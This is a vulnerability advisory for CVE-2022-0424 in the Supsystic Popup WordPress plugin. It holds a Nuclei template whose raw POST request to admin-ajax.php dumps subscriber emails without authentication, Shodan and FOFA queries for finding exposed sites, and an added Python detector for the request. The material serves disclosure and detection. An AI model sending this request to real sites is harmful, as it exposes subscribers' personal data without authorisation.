CVE-2022-0424: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure

Date: 2025-08-01 | Affected software: Supsystic Popup | PoC: public

Vulnerability Description

The Popup by Supsystic WordPress plugin before 1.10.9 does not perform any authentication or authorisation check in one of its AJAX actions, allowing unauthenticated attackers to call it and obtain the email addresses of subscribed users.

PoC Code [public]

id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: s4e-io
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.25772
    epss-percentile: 0.96061
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
    fofa-query: body=/wp-content/plugins/popup-by-supsystic
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - "_wpnonce"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c8fd7e57d42bfc9f80894210e6edab292e6f68e94c476befa25f78dde4571800022057e00c7daad7969ebfdc80519cc68d876162f75e233723af8b0e4e899c1e3297:922c64590222798bb761d5b6d8e72950
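The following is an added example, not part of the advisory or of the Nuclei template above, written from the defender's side. It parses a raw HTTP request of the shape shown in the PoC and flags it when the vulnerable admin-ajax action (action=getListForTbl, pl=pps, both taken from the PoC body) is called without a WordPress login cookie, which is the CWE-306 condition the advisory describes; it also re-creates the template's response matchers (status 200 and all listed words, condition: and) so both halves can be exercised offline. Assumptions: the presence of a wordpress_logged_in_<hash> cookie is used as the "authenticated" heuristic, the hostnames are placeholders, and the sample JSON response is constructed for the test, not captured from the plugin.

```python
"""Request-side detection and response-side matcher check for CVE-2022-0424.

Added example: not the advisory's or the plugin's code. Parameter names come
from the PoC request; the cookie heuristic and sample payloads are assumptions.
"""
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "getListForTbl"   # AJAX action from the PoC body
VULN_PLUGIN = "pps"             # "pl" value from the PoC body

# Words the Nuclei template requires in the response body (condition: and)
MATCH_WORDS = ['"id":"', 'username":"', 'email":', 'hash":"', "_wpnonce"]


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip().split("\n")
    parts = lines[0].split()
    method, target = parts[0], parts[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs returns lists; keep the first value of each field
    form = {k: v[0] for k, v in parse_qs(body.strip()).items()}
    return {"method": method, "path": urlsplit(target).path,
            "headers": headers, "form": form}


def is_logged_in(headers: dict) -> bool:
    """Assumed heuristic: WordPress sets wordpress_logged_in_<hash> for sessions."""
    cookie = headers.get("cookie", "")
    return any(c.strip().startswith("wordpress_logged_in_") for c in cookie.split(";"))


def is_unauth_subscriber_dump(raw: str) -> bool:
    """True when the request matches the PoC pattern and carries no login cookie."""
    req = parse_raw_request(raw)
    form = req["form"]
    return (
        req["method"] == "POST"
        and req["path"].endswith("/wp-admin/admin-ajax.php")
        and form.get("action") == VULN_ACTION
        and form.get("pl") == VULN_PLUGIN
        and not is_logged_in(req["headers"])
    )


def response_matches_template(status: int, body: str) -> bool:
    """Evaluate the template's matchers: status 200 AND every word present."""
    return status == 200 and all(word in body for word in MATCH_WORDS)


# Constructed samples (hostname and cookie value are placeholders)
POC_BODY = ("page=subscribe&action=getListForTbl&reqType=ajax&search=@"
            "&_search=false&pl=pps&sidx=id&rows=10")
POC_REQUEST = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n" + POC_BODY
)
AUTHED_REQUEST = POC_REQUEST.replace(
    "Host: example.invalid\r\n",
    "Host: example.invalid\r\nCookie: wordpress_logged_in_deadbeef=admin|placeholder\r\n")
BENIGN_REQUEST = POC_REQUEST.replace("action=getListForTbl", "action=heartbeat")

# Constructed response shaped to satisfy the template's word list (not a real capture)
LEAKY_RESPONSE = ('{"page":1,"total":1,"rows":[{"id":"1","username":"subscriber",'
                  '"email":"user@example.invalid","hash":"abc123","_wpnonce":"x"}]}')

if __name__ == "__main__":
    for label, req in [("poc", POC_REQUEST), ("authed", AUTHED_REQUEST),
                       ("benign", BENIGN_REQUEST)]:
        print(f"{label:7s} unauthenticated subscriber dump: {is_unauth_subscriber_dump(req)}")
    print("template matches sample response:", response_matches_template(200, LEAKY_RESPONSE))
```

The request-side check is the one to wire into a WAF or reverse-proxy rule while the plugin is below 1.10.9; the matcher re-creation is only there to show what the template treats as a positive result, so an operator can read their own response bodies against it.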